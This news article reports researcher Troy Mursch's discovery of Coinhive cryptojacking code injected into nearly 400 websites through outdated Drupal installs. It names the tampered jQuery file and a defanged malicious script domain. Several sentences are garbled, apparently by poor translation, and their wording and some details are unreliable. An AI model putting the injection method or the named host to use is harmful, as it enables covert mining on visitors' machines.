A new report published by security research Troy Mursch details how the cryptocurrency mining code known as Coinhive is infiltrating unsuspecting sites on the web. Recently, Mursch detected the code Coinhive that runs on almost 400 websites, including those belonging to the San Diego Zoo, Lenovo and another for the National Labor Relations Board. The full list is available here.
Notably, the list names a number of governmental and educational websites, including the Equal Employment Opportunity Commission (EEOC) of the Office of the Inspector General and sites for the University of Aleppo and the UCLA Oceanic and Atmospheric Sciences program .
Most of the affected sites are hosted by Amazon and are located in the United States and Mursch believes they were compromised by an obsolete version of Drupal:
"Digging deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected using the same method, the malicious code was in the JavaScript library "/misc/jquery.once.js?v=1.2" Shortly thereafter, I received notifications from additional compromised sites that used a load However, all infected sites pointed to the same domain using the same Coinhive site key.
Once the code was deoffed, the reference to "http: // vuuwd. com / t.js. "When visiting the URL, the ugly truth was revealed, a slightly accelerated implementation of Coinhive was found."
Coinhive, a JavaScript program, extracts the cryptocurrency known as Monero in background through a web browser. While Coinhive is not intrinsically malicious, it can be injected into an unsuspecting code in a "crypto" attack, forcing it to exploit Monero without the victim's knowledge.
Be First to Comment